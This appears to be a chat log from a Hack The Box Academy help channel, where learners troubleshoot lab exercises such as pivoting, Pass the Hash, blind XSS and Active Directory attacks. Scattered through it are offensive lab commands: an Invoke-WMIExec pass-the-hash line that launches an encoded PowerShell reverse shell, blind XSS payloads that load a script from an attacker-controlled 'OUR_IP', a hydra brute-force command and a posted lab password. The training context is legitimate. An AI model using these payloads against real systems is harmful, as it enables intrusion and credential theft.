Hey, I am new to this and am stuck on Junior Cybersecurity Analyst - Linux Fundamentals. The two questions it keeps telling is wrong is Which kernel release is installed on the system?(Format: 1.22.3) I used uname -r and got 6.12.32-amd64. For the answer I used 6.12.32 and 6.12.32-amd64 which it is saying is incorrect. The other question is asking What is the name of the network interface that MTU is Set to 1500? I see there are two showing 1500 ens3 and tun0 but it is also stating both are incorrect. oh and i used ip link show as the command to pull up the information. Any help would be greatly appreciated.

fathom pendant
dull burrow
clear jungle
untold knot
#

Hi I am at
Module Name: Introduction to Windows Command

Section Name: Skills Assessment

Question: What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.

What I've tried: I have looked at logon failures, but every user account which is in the logs is not the valid answer. And there a several with a similar number of failed logins. What can I do?

jolly birch
#

Hi everyone, I am facing some technical difficulties.

Module: Getting Started
Sectione: Nibbles - Initial Foothold

I have started a instance and got the IP. I am able to access the http://<IP-address> page. But not able to access http://<IP-address>/nibbleblog/ page.

I have also changed my VPN server and also cleared history in my browser. I tried curl http://<IP-address> which was working fine. But curl http://<IP-address>/nibbleblog/ is not.

final shale
#

I got an email saying my learning streak was in danger even though i completed it and did the amount of lessons needed. Did any one else get that email?

tired locust
#

Hello
This is DcSync section of Active Directory Enumeration & Attack Module!
The idea is simple,I am going to perform DcSync attack against adunn user utilizing both windows Ms01 machine and also linux machine as my attack host,since I need linux host to run secretsdump.py
The problem is,I can successfully connect to my windows machine,but I can't connect to linux machine with given credentials through ssh
Have you encountered this problem while doing lab?

#

By the way I can't install secretsdump.exe module which is essentially the compiled version of secretsdump module for windows,as I do not have internet connection on my windows host

gray yacht
tired locust
clear jungle
valid gate
#

Hey guys, for the Pivoting skills assessment for the CPTS, I'm having trouble figuring out how to transfer a file from the Windows machine in the first pivot back to my attack host. Any suggestions?

fossil jacinth
#

Basic approach is to transfer it first to the pivot box and then to the attack host.

valid gate
#

True, but the pivot host is a linux box with python3 installed, so I tried starting a python http server and sent a post request from the Windows machine, but it ultimately didn't work and returned "Unsupported Method ('POST')"

fossil jacinth
#

Yep, you can't place (POST) files with a simple http.server.
Maybe search the net for a python server script that accepts PUT so that you can place a file.

valid gate
#

hmmm perhaps

fossil jacinth
#

Another option is to base64 encode / decode if it's not too big of a file.

#

Or if you have RDP access you can mount a folder with xfreerdp (/drive:) and use the GUI to copy-paste.

fathom pendant
valid gate
valid gate
clear jungle
fathom pendant
#

if you want to load a third-party module, you'll need to download and transfer it over

uncut slate
#

Where is the help thread?

#

I’m stuck on a problem

waxen totem
uncut slate
#

@waxen totem Do you have experience with process injection

waxen totem
sudden cloud
#

did anyone come across the HARD LAB in the Footprinting module? I eventually completed it, but I don't understand one thing (that I had to google): when I got Tom's ssh private key and logged into the server, there was nothing useful for finding the flag. how could I think about mysql? it wasn't showing up as an available port during the nmap scan

grand loom
#

DACL Attacks II - Skill Assessment - Last Question

To compromise the DC we Link a GPO to the Site (Default-First-Name-Site) using Tangui, his permission is shown in the screenshot. My question is how does this effect the DC? The host isn't in that container described.

grand loom
#

Figured it out, that was displaying computer located at which OU i just switched that to computers in which site

lusty terrace
#

anyone doing the Password attacks - Pass the Hash - skill assignment for the last question "Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt." I already rdped into the machine earlier with the credentials provided I started the netcat listener on the machine and did what the module taught, e.g., PS c:\tools\Invoke-TheHash> Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e {encoded value}" however Im not getting the reverse shell back on the machine :/

#

any ideas would be much appreciated

silver sapphire
#

Hey, can anyone help with HTTP Misconfigurations - Skills Assessment - Hard?

#

I could triger myself promo to admin but it is not trigerred by any "virtual" admin?

misty solar
#

hello, I'm currently doing footprinting --> IMAP / POP3 but I'm struggling to connect to IMAPS service, I'm using the command openssl s_client -connect 10.129.42.195:imaps and after I'm using the command to login with the provided credentials I don't receive any response back from the service ? Can someone help me to understand what's going wrong ? Thanks.

silver sapphire
#

I dunno if lab is broken or am I missing something?

marble quiver
#

Linux Privilege Escalation - Miscellaneous Techniques: How do I fix this error?

./shell: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./shell)

waxen totem
fathom pendant
acoustic owl
#

The script will run smoothly once you have modified all HTTP requests.

#

iirc 2x GET Request + 2x POST Request

rotund ore
#

Hey Guys, im currently doing the Detection and Analysis Stage (Part1) of the Incident Handling Process Module.
Its asking for the username who executed the Mimikatz Tool.
I am pretty sure i have the correct one which should be the sourceUser. Is there anyone that has a tip, is this a known Validator Problem?
https://academy.hackthebox.com/module/148/section/1367

eternal vigil
#

Attacking Common Services Skill Assessment - Medium

I was not able to get a foothold by enumerating any serviced i found through the scan nmap -sC -sV <ip> , then i ran a complete nmap scan without any scripts or version scans, nmap -p- <ip>

Stats: 2:06:26 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 85.29% done; ETC: 00:00 (0:21:48 remaining)

Now it has been running for over 2 hours, still ongoing !!!

cloud urchin
eternal vigil
#

i clearly mentioned i only did nmap -p

cloud urchin
#

oh i thought you said you did nmap -sC -sV, my bad

eternal vigil
#

no problem

cloud urchin
#

things generally don't take that long with htb though, they don't want you scanning/bruteforcing for more than like 30 mins or so

eternal vigil
#

the hard and easy labs were easy but i am stuck on medium one like ugh meanwhile everyone is saying it is the easiest one of all t~t

marble quiver
#

But my Documentation & Reporting RDP is acting up

#

Cant even open Obsidian on it for the Skill assessment

#

Probably heavily dependent on time of the day

left frigate
#

Doing Web attacks module ---> xxe and the CDATA section. Anyone managed to get it to work or done it because I literally did it all step by step and still cannot get the flag

oak gulch
#

Hi I have this specific problem with SOC Analyst path, especially with the module "Introduction to Malware analysis: Debugging". I did everything and still getting the message "sanbox detected". Maybe I missed something, but I am stuck here and I have no idea what is wrong. Can anybody help me with this?

marble quiver
#

Shells & Payloads - The Live Engagement

Once opened, students need to click on ||"Manager App"|| and provide the credentials removed:removed (which were provided under "Host-1 hint" in the module's section):

#

This is terrible imo

#

How would I get there without the provided credentials? No common password list I used contains the password

fathom pendant
fathom pendant
#

the module is above tier 0; please don't spoil info from it

cobalt garnet
fathom pendant
#

you can ask it without revealing module information such as specific headers. Most people do AEN blind if they're doing the CPTS track, and it's not impossible to figure out what you need to do.

cobalt garnet
#

Okay, I understand. But throughout my preparations I was told that everything I would need for the exam was in the path, and frankly I can't find mentioned anywhere that specific kind of attack. Was there some specific area I missed because honestly I couldn't have guess the method used by myself although I thought I was prepared enough to do it.

cloud urchin
fathom pendant
#

but yes, verb tampering is taught -- maybe not this specific thing, but it is taught, the exam itself is also not copy/paste from the path

#

so be prepared to do a little bit of legwork to get the reward

cloud urchin
#

That specific thing, TRACK, is actually covered in the Web Attacks module too. Look at the Web Enumeration & Exploitation section.

#

with the same header you asked about

#

oh sorry that was from AEN i was reading lol

#

but yeah, AEN is part of the path

#

verb tampering is covered in web attacks

cobalt garnet
# fathom pendant AEN != the exam

Ok got it ! Of course I wasn't expecting to get a copy/paste and was prepared to do some thinking to connect the dots but strictly in the context of what the path teaches, I didn't know I was supposed to do extra research to get there since I was repeatedly told, "everything is in the path". Thank you for the answers.

cobalt garnet
# cloud urchin but yeah, AEN is part of the path

Yes I know, but as MarcieLee said, not this thing specifically, but I guess you're right, I do undertsand that AEN teaches extra things by itself. Anyways, thank you both for your assistance. I'll try to go deeper and do my best next time.

brazen timber
#

Is anyone willing to offer some guidance on the LLM Output Attacks skills assessment? Been stuck with the imagebot for days

sudden cloud
stuck glen
#

Hello, anyone knows how to use bloodyAd to find User-Force-Change-Password rights ?
It is not showing when I do get writable but bloodhound and dacl.py shows it

#

||I got stuck of sliver skill assessment question 1 because of that||

unique quarry
#

hello guys, i'm at the module "Setting up" and I've strugling with the virtualbox, when i run the proxmox instance, when i go to install it the screen became all black and dont happen anything, someone could help me, please?

fathom pendant
#

Think of it more as a reference guide, than a manual of operation

unique quarry
#

just to be sure so, theres is a problem if this happen in a parrotos instance too?

#

when i actually install the os

fathom pendant
#

ProxMox is, itself, a container manager. That's why it has issues within a virtual machine environment

unique quarry
#

thx!

fleet spear
cinder tinsel
#

Hi everyone,

I am going through the skills assessment for Windows Lateral Movement, and I was able to gain access to the server using the Arturo account. However, there is no flag on the desktop. I’m not sure whether this is a content issue or if I am missing a step. Could you please provide some guidance?https://academy.hackthebox.com/module/263/section/3095 second question

cloud urchin
cinder tinsel
cloud urchin
cinder tinsel
cloud urchin
#

you're not looking in the right spot. it's on his desktop 100%.

cinder tinsel
cloud urchin
#

you can send me a dm if you need a bigger nudge

elder prawn
#

for password attack skill assessment, my kali vm cannot rdp as hwilliam, but pwnbox is able to .
is this intended behaviour?

hasty mauve
waxen totem
#

@elder prawn please refrain from spoiling skill assessments (there was a password in your image). Also possible it's your vm config

elder prawn
#

any idea what config could be the issue?

#

am able to authenticate to smb though, which is rather strange

waxen totem
elder prawn
waxen totem
elder prawn
#

tried adjusting my mtu, didnt work. but my openvpn connection is indeed horrendous so i'll take that as an answer, thanks for the help

hasty mauve
tight copper
#

Credential Hunting in Network Shares

As this user, search through the additional shares they have access to and identify the password of a domain administrator. What is it?

#

and there is fake credential what i can do ?

warm flower
#

does some slides have mistake answer ?
which makes incomplete chapter

mossy hedge
#

man im currently solving second lab in info gathering module and im stuck can anyone help me out

heady sapphire
#

Can somebody explain me the difference between anonymous and null authentication / bind in smb / ldap? I am so confused

waxen totem
heady sapphire
#

No null is not anonymous . They are different things

#

Nxc smb target -u " " -p " " might work where as Nxc smb target -u " guest" -p " " wouldn’t or the opposite

#

And I see people reference null and anonymous auth but I am configured what is what

dusk holly
waxen totem
tight copper
#

Credential Hunting in Network Shares
As this user, search through the additional shares they have access to and identify the password of a domain administrator. What is it?

i have get so many password HTB_@cad3my_lab_W1n19_r00t!@0 i have found it in temp
MyAwesomePassword! its was crpyted by AES

i have use the logiciel they use but nothing work
there is fake crendetial too

ocean bolt
#

Hi guys, please is anyone of you has completed vulnerability skills assessment?

dusk holly
#

probably you mean vulnerability assessment

ocean bolt
#

Yes

#

Have you completed

dusk holly
# ocean bolt Have you completed

ask your question directly, mention which section and in which question are you stuck, also mention what you tried and what you found

gray yacht
stark hedge
rotund ore
#

Hey Guys, im currently doing the Detection and Analysis Stage (Part1) of the Incident Handling Process Module.
Its asking for the username who executed the Mimikatz Tool.
I am pretty sure i have the correct one which should be the sourceUser. Is there anyone that has a tip, is this a known Validator Problem?
https://academy.hackthebox.com/module/148/section/1367

#

There is only one Alert with Mimikatz Tool executed so i guess i am looking at the right alert. In it there are only two options if the module is asking for "domain/user_name." either the sourceUser or the targetUser, but more likely the sourceUser.
Both wont get accepted as a answer not even in all possible variations of Capital and lowercase letters that would make sense

#

its blocking me from completing the Junior Cybersecurity Analyst Path and driving me crazy 😂

tall pike
strange aspen
#

hi guys i stuck at file upload attacks/skills assessment. i think the intended way to find the upload path is to use a svg image with xml code to read the /contact/upload.php. i tried but im not able to trigger xxe execution: either i get the code as text in base64 back when i use jpg or jpeg as mime type or when i dont use a mime type i get only an 500 server error. pls can someone help me?

fathom pendant
#

Base64 can be decoded :)

strange aspen
#

as i said i only get the text back, no execution

fathom pendant
#

Well... it can lead to further information such as where files get uploaded to, and if any modification is done to filename when you upload

light palm
#

Is anyone else experiencing issues connecting to targets? I have completed like 20 modules with no problems but not it seems nothing is working. I can't connect neither on the pwnbox (sometimes it works but very unreliable) and literally never on my vm even if I connect with the VPN. What is going on???

#

or is everything normal with you guys?

strange aspen
#

okay i repeat: i used svg with xxe payload. as return i get my payload in base64. the xxe did NOT get triggered!

shut wraith
#

Hello how do I go from here

#

To configuring the DNS server here

digital pendant
#

What module is this? Need context @shut wraith

shut wraith
#

But I dont know how to setup the DNS server

cloud urchin
#

ncpa.cpl -> right click the nic -> properties -> highlight ipv4 -> click properties

cloud urchin
#

i don't like using the gui so i just use the run command

shut wraith
#

I mean I think this is a really valuable exercise

#

Because in real engagements its common to drop a laptop on site

#

And then you obviously have to configure the DNS server

cloud urchin
#

i think usually dns servers get found through dhcp automatically

#

generally in the environments i see they run a dc with dns services running, and none of the endpoints have a hardcoded nameserver

shut wraith
#

Interesting, this tells me that you usually get access through a tunnel or RDP to their workstation

shut wraith
#

Should I still use impacket bloodhound even though ipsec said rusthound is better

#

Anyone have any notes for using rusthound

acoustic owl
dry halo
acoustic owl
#
rusthound-ce --version
---------------------------------------------------
Initializing RustHound-CE at 19:34:50 on 01/18/26
Powered by @g0h4n_0
---------------------------------------------------

rusthound-ce 2.4.7
#
dry flint
#

I know this is all very basic and elementary stuff, but I am more proud of this than I am any other academic achievement in my life. I know I just essentially typed "Hello World" but this means so much to me and I am so excited and grateful to be here and continue learning - thank you!!

https://academy.hackthebox.com/achievement/2299640/289

strange aspen
#

hi guys i stuck at file upload attacks/skills assessment. i think the intended way to find the upload path is to use a svg image with xml code to read the /contact/upload.php. i tried but im not able to trigger xxe execution: either i get the code as text (and not the result) in base64 back when i use jpg or jpeg as magic bytes or when i dont use a mime type i get only an 500 server error. pls can someone help me?

fleet spear
#

have you checked the erratum?

#

i think marcilee wrote something about the file upload

scenic parcel
fleet spear
#

to get the reverse shell you need to send the command $cmd =iex(download.string....) ;invoke-Reverse

#

i would say the instructions are abit unclear

long flint
#

Hi guys, i'm doing this module:
Detecting Windows Attacks with Splunk

but when I entered the Zeek section, the webapp seems to not load at all. "connection reset by peer". I was even able to RDP to the server and try localhost:8000 but i also get "connection reset by peer". Is this module broken?

strange aspen
somber barn
#

i completed a bunch of tier 2 modules with the yearly subscription. will i still have access to these modules once my subscription ends?

scenic parcel
ocean night
#

TLDR; yes

cloud urchin
#

Only 4 more weeks

jovial walrus
#

Can anyone help me with fetching marlin's passowrd on smtp section on attacking common services

#

Command: hydra -l 'marlin' -P ./pws.list -f 10.129.111.69 pop3

somber barn
jovial walrus
#

tried but it didnt work

#

reset the lab and got flag

#

this might be true

left needle
#

why is this error when uploading json files in bloodhound

foggy jackal
#

Hi all, I am stuck on Q2 of the DACL Attacks II skill assessment. I have identified possible attack paths, but i am missing one step. Can I DM someone for a nudge?

fleet spear
left needle
#

I tried to upload both json and zip file

fleet spear
#

sometimes clearing the database and the load them one by one works

acoustic sparrow
left needle
#

netexec

acoustic sparrow
# left needle netexec

i think nxc still runs with bloodhound-python collector
try running it with bloodhound-ce-python and its gonna work

#

bloodhound-python ingestor is the lagacy collcetor and works with lagacy bloodhound

#

correct me if i am wrong never used nxc to collect bloodhound data tbh

left needle
static scaffold
#

Hello, I'm working on the intro to digital forensics module. I completed the first question reasonably well, and leveraged the hash to identify the answer to the second question via VT. I didn't like it, but I couldn't find anything in the memory modules via Velociraptor. Ran many captures and it's hit or miss what's available. Now I'm on the registry key question, but would like some support on the best way to identify the C2 IP and also a lead on how to identify the registry key for persistence given the constraints of Velociraptor.

static scaffold
#

Also, any tips to getting a response? I noticed some questions go unresponded. No shade, just learning how things work here in effort to not waste anyone's time. Are there office hours or something of the sort that I'm missing? Noob keywords I should steer clear of?

storm elk
#

No tips, it's totally voluntarily that people reply here

#

If you're experiencing technical issues, support is there to help, but content wise, it's up to someone to be willing to help 🙂

static scaffold
#

ok, makes sense. thank you hugthebox

lone ferry
#

WiFi penetration testing tools techniques: Skills assessment machine you have to RDP to doesn’t have the tools compiled correctly. Try it using your “solutions” for eaphammer or air-hammer. Going on three days of this garbage

brazen fable
#

What is the name of the function that returns the string inside the cpp file? (Format: FunctionName()).

can someone tell the answer to this question?

module name: Android Fundamentals

#

i typed stringFromJNI() but its giving me incorrect answer

#

??

south mulch
#

Can anyone please help me to understand why could I have troubles pinging academy targets from pwnbox?

marble quiver
#

Why can't I connect via RDP to the machines today?

#

I can ping the machine (slow response, but a response)

acoustic owl
marble quiver
south mulch
acoustic owl
#

Then the problem must lie elsewhere.

mortal wharf
#

Someone here knows why I cant connect to the assessment page of the XSS Module ? "http://targetip/assessment/" I am connected to the VPN but the side is not loading. I already changed the VPN and terminated the machine multiples times.

#

All other pages are loading but the assessment is not loading

#

@acoustic owl Maybe you can help me ?

acoustic owl
#

Which XSS module are you referring to? Was a port specified for the target? Check http or httpS?

left needle
acoustic sparrow
static scaffold
mortal wharf
#

No specific port mentioned

#

I can connect to the ip and other paths like /phishing but not to the /assessment path

acoustic owl
mortal wharf
rain snow
#

Hi, i need help with htb academy room. For the rooms where i am supposed to host a server to get a hit, doesnt seem to workout for me, can anyone please help me in troubleshooting the same?

fathom pendant
rain snow
#

session hijacking- blind xss, blind xxe etc

#

all the module assessments where we need to host our own server to get a hit. idk if it makes sense

compact patrolBOT
mortal wharf
#

you can connect to the server if you write in the .js paylaod your ip ("ip a" to get the ip)

mortal wharf
mortal wharf
#

yes

rain snow
#

blind xss methodolody is - first to confirm on which field its present

mortal wharf
#

Yes you need to find the payload which works

rain snow
#

so for that we simply host a server and then <payload with vpn's private ip in fileds> n click send, it shd trigger right

#

i should get a hit

#

but i am not getting anything

mortal wharf
#

yes

#

try other payload

rain snow
#

payload is correct, i tried with write up too

#

doesnt work

#

so i am assuming something is wrong

#

so i would want someone to have a look at it

fathom pendant
#

Are you specifying the ip properly in your payload

rain snow
mortal wharf
#

you need your ip

fathom pendant
#

Well yes, the 10.10.x.x ip

#

I forget the ranges that get assigned

rain snow
#

yeah those only

mortal wharf
#

write "ip a" in the console and look at tun0: the first ip

rain snow
mortal wharf
#

Thats the ip which need to be in the payload

#

no port

#

just ip

rain snow
#

is there a problem if i use wsl?

#

i dont understand why is it not working

mortal wharf
#

<script src=http://OUR_IP></script>
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement('script');a.src='http://OUR_IP';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://OUR_IP")</script>

you tryed all this payloads ?

rain snow
#

i tried the first 4

mortal wharf
#

One of those is right. I did the exercise few hours ago

rain snow
#

same thing is happening with other modules which requires hosting a server of our own

mortal wharf
#

I msged you private

foggy jackal
#

hey did you manage to get this?

gray yacht
marble quiver
#

The Windows Privilege Escalation - Citrix Breakout VM is so slow

#

Its not possible to even log in in <5 Minutes

abstract gull
#

The Pivoting Module it just gets stuck at this point without returning the flag. I tried using proxychains but no response, I tried even from the jump host but same. Any leads will be helpful

proven stirrup
#

guys I'm having issue with ad lab 1 while using multi handler can I dm someone please

tropic heron
#

I ran man dconf-service

ocean bolt
#

Is there anyone here who has completed the vulnerability assessment, specifically the Nessus skill assessment question 3? What is the highest criticality plugin ID from the Windows authenticated scan?

ocean bolt
#

@strange aspen okay thank you

strange aspen
ocean bolt
#

@strange aspen, may I ask you to help me directly whenever I face a challenge?

jovial walrus
#

I completed attacking common services easy but I was wondering|| if the webshell is accessible when you navigate to the target in the browser ? In my case I uploaded the webshell using mysql db and used curl to get a reverse shell via the webshell||

fathom pendant
brazen fable
elder prawn
#

seomtiems boxes are too laggy i cant even rdp in. are boxes usually unstable nowadays or is it just me

jovial walrus
#

On attacking common services medium if I am trying to scan all ports how do i get results more quickly without sacrificing accuracy
is specifying T4 better than giving --min-rate
what are my options ?

proven stirrup
gusty mortar
#

Advanced SQL Injections - Skills Assessment
Anybody i can DM ?

mortal totem
#

Hi, anyone has connection issues for Attacking Common Applications? I can't connect to the boxes at all via VPN, the parrotbox works for 30 seconds and the box just dies after that. Pinging shows that the box is dead, I can't get any progress with it.

The boxes from other modules work fine though

compact otter
#

hello, im on the skill assessment in the information gathering module (CWES) and im trying to solve the 3rd question

i found the hidden admin directory but when i try to navigate to it, it says "site can't be reached". And i also tried doing it through curl but was met with the same problem

PS: im able to go to /robots.txt but i just cant get into the admin directory

scenic parcel
novel sand
#

Can anyone please help me regardin sql injection fundamentals, Skill Assesment section. I’m stuck. Please guide me or any update walkthroughs out there?

ocean bolt
#

Please can anyone of you me to solve vulnerability assessment: nessus skills assessment, typically question 3. What is the highest criticality plugin ID for the windows_authenticated_scan

warm pumice
#

Hi everyone,
i would like to report that in the exercice for the Containers chapter in the Linux priv esc module in the pentester path (link : https://academy.hackthebox.com/module/51/section/1588), the target machine keeps crashing after image list or image initiation (ex. lxc init alpine privesc -c security.privileged=true), even after respawning the target multiple times and waiting, it just keeps crashing.
i even tried to run linpeas.sh on it to find a diff vector, and it crashed again lol
Any help would be much appreciated ❤️

fathom pendant
#

try changing vpn regions and/or reaching out to support if the env keeps crashing

compact patrolBOT
warm pumice
#

thxx

dusk holly
#

currently doing Attacking common services - easy lab, but can't find foothold, i am kinda sure that SMTP can be used to enumerate users but getting nothing out of it honestly, tried manual user enumeration and also used smtp-user-enum with higher wait seconds: 20 but didn't get anything, tried all three methods of user enumeration

#

@fathom pendant i saw you helping others by saying try 15+ wait time, but it didn't worked out so maybe i though the lab is broken

#

any help would be appreciated

#

nevermind, i was supposed to use another domain, but i don't know how we are supposed to guess it

dusk holly
graceful ferry
#

Can anyone give me a nudge on Advanced XSS and CSRF Exploitation - XSS Filter Bypasses

I bypassed the filter (checked with alert(1) when i view the comments)

I am using a standard exploit for exploit.htb server, but when opening the comments and checking the developer console, it says that /home.php or /view.php do not exist
||When i change the link from /view.php to filterbypass.htb/view.htb then i get CORS errors, which i can't fix||

Am i on the right track or? It feels like i'm missing something simple but i'm stuck

mortal wharf
#

Hello, is there a way to filter Labs based on content / specific skills ? I realy liked the XSS Module in the Academy but would like to practice XSS more.

heady atlas
#

can someone help me with the wordpress module skill assessment

upper haven
compact otter
heady atlas
#

any idea what exactly this question wants me to find

elder prawn
#

can't spawn machines, why?

#

everytime i have to swap servers due to not being able to rdp... and it will only work on my pwnbox most of the time

#

is there a checklist i can follow to troubleshoot all vpn connection issues efficiently?

hasty mauve
elder prawn
#

i almost thought i could never rdp in cause of my connection, this is unacceptable!!

silk lagoon
fleet spear
#

the citrix escape i could not get paint to open my mounted folder samba share i could only get powershell to "mount" maybe i just needed todo some configuration on the citrix client for it to work to open it through paint?

elder prawn
#

@silk lagoon here's an example

silk lagoon
strange aspen
#

i stuck at file upload attacks skill assessment can someone help me

warm horizon
#

"Hi, I'm stuck in SQLMap Essentials Case 5. I've already confirmed that the 'id' parameter is vulnerable because id=1 OR 1=1 returns all records. I tried using sqlmap with --prefix and --suffix to close the parentheses ((' ')), but sqlmap doesn't detect the injection as 'injectable'. I tried a manual UNION and didn't get any text returned. Could you give me some guidance on whether this case requires a specific blinding technique or if there's some character filter (WAF) that I'm ignoring?"

fathom pendant
elder prawn
fathom pendant
elder prawn
#

oh wait

#

i think im getting you

#

let me try agian

fathom pendant
#

a; target
b; middleman
c; final target
a -> b; single hop
b -> c; double hop

elder prawn
#

nah, i think my routing is fine

#

it's just the vpn acting up

fathom pendant
elder prawn
fathom pendant
#

AH

elder prawn
#

there are 10000 victors

fathom pendant
#

that's a different section/module

elder prawn
#

oh,mb

fathom pendant
#

that's why i asked about the double hop

elder prawn
#

i am currnetly doing the skills assessment

fathom pendant
#

? pivoting module? (your screenshot doesn't show the skill assessment)

#

(this is where it would be helpful to provide the module name and section name to remove confusion)

elder prawn
#

as in , the issue i presented was prior but i kinda conflated the double hop thing with the current section im doing (skills assessment)

#

😅

#

nonetheless, i'm still facing rdp issues very often

fathom pendant
#

the screenshot you provided doesn't match the skill assessment for that module

#

is what I'm saying

elder prawn
#

yes i gotchu

fathom pendant
#

that's why I'm confused

#

if you're having issues with pivoting, then it's likely an issue with your setup rather than the env itself

elder prawn
#

but it's sporadic, it works sometimes it doesnt

fathom pendant
#

sometimes running proxychains with sudo helps more

marble quiver
#

Machines not spawning again?

barren robin
#

I am going through the Incident handling process module right now and one of the questions is throwing me off on how it wants it formatted.

During recovery, IOCs are still observed intermittently. Should recovery proceed, or should the case be escalated back to the investigation phase? Answer format: Recovery/Investigation

How am I supposed to answer this?

fathom pendant
#

@lyric idol dont dm without asking

fathom pendant
barren robin
#

Oh now I get it. thanks!

dusk holly
#

isn't it a bit unfair that in attacking common services easy skills assessment, we are supposed to work with inlanefreight.htb domain at some parts, while it was not mentioned anywhere and nmap showed other domains and host names

fathom pendant
dusk holly
fathom pendant
#

I mean, you shouldnt solely rely on one source of info. Once you see certain things you should be able to enumerate based off that

dusk holly
fathom pendant
fathom pendant
dusk holly
fathom pendant
#

You can find enough info via enumeration to not just "blindly guess" the domain

fathom pendant
#

Point is, its not 'unfair'

dusk holly
rose jasper
#

guys im having an issue w this guided assesment in network foundation module
the tutorial says it will say: data connection already open
but when i try it says cannot open data connected

#

its regarding ftp

#

the optional assesment\

#

this is what is supposed to happen:

#

and this is what actually happened:

#

what am i doing wrong?

indigo pendant
#

Module Name : Intro To Network Traffic Analysis
Section : Packet Inception, Dissecting Network Traffic With Wireshark

I have captured a packets via WireShark on the VM, but I want to save and transfer it to my local machine for analysis (as VM is very laggy). Is it possible?

dry halo
shut wraith
#

ADCS module

ESC1

Requesting the cert is not working

fathom pendant
indigo pendant
dry halo
fathom pendant
#

Lol its just ftp

#

Generally I dislike them having you use nc for all this instead of the tool for it...

indigo pendant
# dry halo which hypervisor are you using?

I'm not using a VM, but connected to HTB's target VM over RDP. What I mean is:

  1. I used the HTB vpn connection file to establish a conneciton b/w my local machine and HTB servers
  2. Then I spawned the target, and using rdesktop I RDP'd into the target VM.
  3. I captured packets on the target VM and now want to move the pcapng file from that VM to my local machine.
#

*elaborated the steps coz maybe I wasn't clear enough from beginning

indigo pendant
#

I managed transfer via FTP finally!

quasi bay
#

Hi does anyone know how to fix my he slow connection to the vpn when trying to open the web on the ip given is like loading for like 30 sec

#

I see some dns change on the hosts file but idk

analog oasis
#

hello everyone, in the password attacks module, specifcally the pass the ticket linux section, starting from the using sub section named "Using Linux attack tools with Kerberos", i don't really understand what is going on, what we are doing, like we need to forward our traffic from our attack machine through ms01 to linux01? but in the explain he jumped into this "Finally, we need to transfer Julio's ccache file from LINUX01 and create the environment variable KRB5CCNAME with the value corresponding to the path of the ccache file."
but like how get the ccache file using our attack machine privileges? or even ms01 privilegs? don't we need to be root first or something, I am really a newbie in terms of AD so maybe i missed smth so hope someone helps

runic fractal
#

issue with the Linux Fundamentals module:

        inet 209.151.154.68  netmask 255.255.252.0  broadcast 209.151.155.255
        inet6 fe80::a4ba:3bff:fe08:4c0b  prefixlen 64  scopeid 0x20<link>
        ether a6:ba:3b:08:4c:0b  txqueuelen 1000  (Ethernet)
        RX packets 12176  bytes 24114532 (22.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 10193  bytes 9966465 (9.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 22476  bytes 9777466 (9.3 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 22476  bytes 9777466 (9.3 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 10.10.15.226  netmask 255.255.254.0  destination 10.10.15.226
        inet6 dead:beef:2::11e0  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::c519:5dcb:5f2e:6261  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 218  bytes 18312 (17.8 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 225  bytes 18684 (18.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

The question being What is the name of the network interface that MTU is set to 1500?

I tried Tun0 and ens3 however none of these worked. I'm a little stuck.

jovial walrus
#

on this password attacks module I am kinda confused on the difference between extracting lsa secrets and dumping lsass memory
as per my understanding lsa secrets include domain logon creds, service account pass and scheduled task creds as well as dpapi keys and dcc2 hashes
whereas lsass memory has kerberos tickets, ntlm hash and clear text pass if wdigest is enabled as well as dpapi keys
is my distinction correct
moreover can someone tell me what priv we require for either operation and what to prefer in which scenario

white vale
#

does anyone know why some machines time out to reach out to them? or you know how to fix that?

finite current
#

Can anyone give a hint on the DACL II skills assessment question 2. I have the SDE01 server admin and found Angel creds but not sure on the path from here to RD09. I have found I can modify a GPO but believe I need to compromise another user to link it to the RD09 box.

white vale
#

for example, you can ping them, and let's say you are trying to enum usernames on smtp but it just times out

#

and nmap after showing open ports now shows filtered

cloud urchin
dusk holly
cloud urchin
#

@violet nebula Please take care not to spoilt content from modules above tier 0. Usernames, passwords, attack paths, etc. Especially for skill assessments. If you feel you need to reveal more info you can ask to DM someone. Otherwise just ask your question without revealing that info, remember anyone who has done the lab and can help already knows all that info so you don't need to say it.

violet nebula
#

Hey guys, after pretty much everything on "Footprinting Lab - Medium" on the Footprinting Module, I'm not being able to run some commands I was able to (like smbclient -U <user> //IP) and I'm not being able to RDP into the server using the right credentials (I was able to before) anymore. Has anyone faced a similiar problem? I tried terminating the Target and spawning a new one and running commands from the attack box. I've also tried restarting my machine as well.

#

Would someone help me doing a quick sanity check? I have the credentials, but now everything just seems broken.

white vale
#

@cloud urchin what can you say about some boxes not working properly, they come and go. connectivity issues and it is not my end. I have tested with Pwnbox and has the same issues: connection is good for a few seconds, then times out

#

I am on skill assessment and the experience is just terrible, should I try on a different time?
will the exam be like this all the time?

